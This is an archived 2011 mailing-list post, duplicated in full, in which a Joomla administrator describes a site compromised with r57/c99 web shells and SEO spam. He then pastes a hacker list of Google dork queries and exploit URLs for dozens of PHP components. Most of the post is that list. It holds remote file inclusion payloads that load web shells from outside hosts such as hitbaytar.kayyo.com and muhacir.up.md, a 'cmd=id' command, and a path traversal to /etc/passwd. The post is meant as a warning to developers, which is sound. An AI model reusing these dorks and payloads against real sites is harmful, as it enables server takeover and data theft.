An interesting r57shell - c99shell exploit
644 views
Skip to first unread message
Rudy Preston
Feb 2, 2011, 1:24:58 PM2/2/11
to joomla-...@googlegroups.com, joomla-de...@googlegroups.com, joomla-dev...@googlegroups.com
Hi All
Had a joomla site on a shared server get hacked and a folder ended up in the public root called "mnt"
if you didn't know joomla, it would easily sit there in plain view.
Inside was a full package of tools for an r57shell and c99 shell setup:
http://www.scribd.com/doc/20337568/r57shell
http://www.scribd.com/doc/20337569/c99shell
With a neat little package of things that were then put into the code for the website using a module they created (not part of the install originally) called "com_ccboard"
It was found in the "modules" folder. It also has code in the configuration.php file and the index.php file of your template in the footer.
the config file code was used to redirect googlebots to pages on an external website but be indexed at the real site (ended up being 25,100 linked pages).
The template index code added a footer full of all the links they had indexed (position -1000, -1000 in the css)
The r57shell and c99shell contains a spam mailer setup that also allows them to create a database table, load a flat file of info into the table, create an object from the tabular data then delete the table. The flat file was filled with links back to a download site the fake index used.
This sent me on a google search to find out a few things. One of the first thing I found out is that google is a hacker's best friend.
But they also cache a page that needs a login for, so I was able to view hacker forum posts without having a login by viewing a search link
in google via the "cached" link on google search results.
Here is an example of what I found (if your component is on this list, hope u study the r57 and c99 scripts to see how they can take over a server from your component):
And, sad to say, this is just one of hundreds of lists like this. Please note that I did see that joomla 1.5.16 caused a lot of back doors to close, it made a big ripple in the forums.
STAY UP TO DATE
Google search:
inurl: "com_flyspray"
exploits:
/ Components / com_flyspray / startdown.php? File =../../../../../ etc / passwd% 00
exploits:
/ Index.php? _REQUEST = & _REQUEST [Option] = com_content & _REQUEST [Itemid] = 1
& GLOBALS = & mosConfig_absolute_path = http://site/sh3L/r57.jpg?cmd=id
Google search:
inurl: index.php? option = com_simpleboard
exploits:
/ Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
Google search:
inurl: "com_hashcash"
exploits:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_htmlarea3_xtd-c"
exploits:
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_sitemap"
exploits:
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_performs"
exploits:
/ Components / com_forum / download.php? Phpbb_root_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pccookbook"
exploits:
components / com_pccookbook / pccookbook.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_extcalendar
exploits:
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "minibb"
exploits:
components / minibb / index.php? absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_smf"
exploits:
/ Components / com_smf / smf.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Modules / mod_calendar.php? Absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pollxt"
exploits:
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_loudmounth"
exploits:
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_videodb"
exploits:
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_pcchess
exploits:
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_multibanners"
exploits:
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_a6mambohelpdesk"
exploits:
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_colophon"
exploits:
/ Administrator / components / com_colophon / admin.colophon.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mgm"
exploits:
administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mambatstaff"
exploits:
/ Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_securityimages"
exploits:
/ Components / com_securityimages / configinsert.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Components / com_securityimages / lang.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_artlinks"
exploits:
/ Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_galleria"
exploits:
/ Components / com_galleria / galleria.html.php? MosConfig_absolute_path = http://site/lang/r57.jpg?
Google search:
inurl: index.php? option = com_simpleboard
/ Components / com_simpleboard / file_upload.php? SBP = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_hashcash"
CODE:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_sitemap"
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_forum"
/ Components / com_forum / download.php? Phpbb_root_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_extcalendar
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "minibb"
components / minibb / index.php? absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_pollxt"
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_loudmounth"
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_videodb"
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_pcchess
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_multibanners"
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_a6mambohelpdesk"
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl: activity.php arabilirsiniz shaped ...
usage: http://hedef/script/language/lang_en...t.com/c99.txt?
Powered phpMyAgenda
Code:
agenda.php3? rootagenda = Shell
agenda2.php3? rootagenda = Shell
inurl: agenda.php3
Excerpt:
agenda.php3? rootagenda = Shell
Calling code: Xero Portal v1.2
[Exploit:
www. [target]. com / [script_pat] / admin / admin_linkdb.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_forum_prune.php? phpbb_root_path = http://evilscripts? # www. [target]. com / [script_pat] / admin / admin_extensions.php? phpbb_root_path = http:/ / evilscripts?
www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_attachments.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_users.php? phpbb_root_path = http://evilscripts?
inurl: "fclick.php? fid"
show.php? path = http://muhacir.up.md/c99.txt?
show.php? path = http://muhacir.up.md/r57shell.txt?
Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability
http:// [target] / [path] / sipss ... s] = [SHELL]
For example:
/ Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path] / shell.x
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
Had a joomla site on a shared server get hacked and a folder ended up in the public root called "mnt"
if you didn't know joomla, it would easily sit there in plain view.
Inside was a full package of tools for an r57shell and c99 shell setup:
http://www.scribd.com/doc/20337568/r57shell
http://www.scribd.com/doc/20337569/c99shell
With a neat little package of things that were then put into the code for the website using a module they created (not part of the install originally) called "com_ccboard"
It was found in the "modules" folder. It also has code in the configuration.php file and the index.php file of your template in the footer.
the config file code was used to redirect googlebots to pages on an external website but be indexed at the real site (ended up being 25,100 linked pages).
The template index code added a footer full of all the links they had indexed (position -1000, -1000 in the css)
The r57shell and c99shell contains a spam mailer setup that also allows them to create a database table, load a flat file of info into the table, create an object from the tabular data then delete the table. The flat file was filled with links back to a download site the fake index used.
This sent me on a google search to find out a few things. One of the first thing I found out is that google is a hacker's best friend.
But they also cache a page that needs a login for, so I was able to view hacker forum posts without having a login by viewing a search link
in google via the "cached" link on google search results.
Here is an example of what I found (if your component is on this list, hope u study the r57 and c99 scripts to see how they can take over a server from your component):
And, sad to say, this is just one of hundreds of lists like this. Please note that I did see that joomla 1.5.16 caused a lot of back doors to close, it made a big ripple in the forums.
STAY UP TO DATE
Google search:
inurl: "com_flyspray"
exploits:
/ Components / com_flyspray / startdown.php? File =../../../../../ etc / passwd% 00
exploits:
/ Index.php? _REQUEST = & _REQUEST [Option] = com_content & _REQUEST [Itemid] = 1
& GLOBALS = & mosConfig_absolute_path = http://site/sh3L/r57.jpg?cmd=id
Google search:
inurl: index.php? option = com_simpleboard
exploits:
/ Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
Google search:
inurl: "com_hashcash"
exploits:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_htmlarea3_xtd-c"
exploits:
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_sitemap"
exploits:
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_performs"
exploits:
/ Components / com_forum / download.php? Phpbb_root_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pccookbook"
exploits:
components / com_pccookbook / pccookbook.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_extcalendar
exploits:
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "minibb"
exploits:
components / minibb / index.php? absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_smf"
exploits:
/ Components / com_smf / smf.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Modules / mod_calendar.php? Absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pollxt"
exploits:
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_loudmounth"
exploits:
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_videodb"
exploits:
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_pcchess
exploits:
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_multibanners"
exploits:
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_a6mambohelpdesk"
exploits:
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_colophon"
exploits:
/ Administrator / components / com_colophon / admin.colophon.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mgm"
exploits:
administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mambatstaff"
exploits:
/ Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_securityimages"
exploits:
/ Components / com_securityimages / configinsert.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Components / com_securityimages / lang.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_artlinks"
exploits:
/ Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_galleria"
exploits:
/ Components / com_galleria / galleria.html.php? MosConfig_absolute_path = http://site/lang/r57.jpg?
Google search:
inurl: index.php? option = com_simpleboard
/ Components / com_simpleboard / file_upload.php? SBP = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_hashcash"
CODE:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_sitemap"
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_forum"
/ Components / com_forum / download.php? Phpbb_root_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_extcalendar
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "minibb"
components / minibb / index.php? absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_pollxt"
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_loudmounth"
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_videodb"
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: index.php? option = com_pcchess
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_multibanners"
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?
Google search:
inurl: "com_a6mambohelpdesk"
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?
Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl: activity.php arabilirsiniz shaped ...
usage: http://hedef/script/language/lang_en...t.com/c99.txt?
Powered phpMyAgenda
Code:
agenda.php3? rootagenda = Shell
agenda2.php3? rootagenda = Shell
inurl: agenda.php3
Excerpt:
agenda.php3? rootagenda = Shell
Calling code: Xero Portal v1.2
[Exploit:
www. [target]. com / [script_pat] / admin / admin_linkdb.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_forum_prune.php? phpbb_root_path = http://evilscripts? # www. [target]. com / [script_pat] / admin / admin_extensions.php? phpbb_root_path = http:/ / evilscripts?
www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_attachments.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_users.php? phpbb_root_path = http://evilscripts?
inurl: "fclick.php? fid"
show.php? path = http://muhacir.up.md/c99.txt?
show.php? path = http://muhacir.up.md/r57shell.txt?
Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability
http:// [target] / [path] / sipss ... s] = [SHELL]
For example:
/ Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path] / shell.x
**--Rudy--**
ethos7.com
Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com
joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7
wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress
Simplicity is the ultimate sophistication
-- Leonardo da Vinci
Reply all
Reply to author
Forward
0 new messages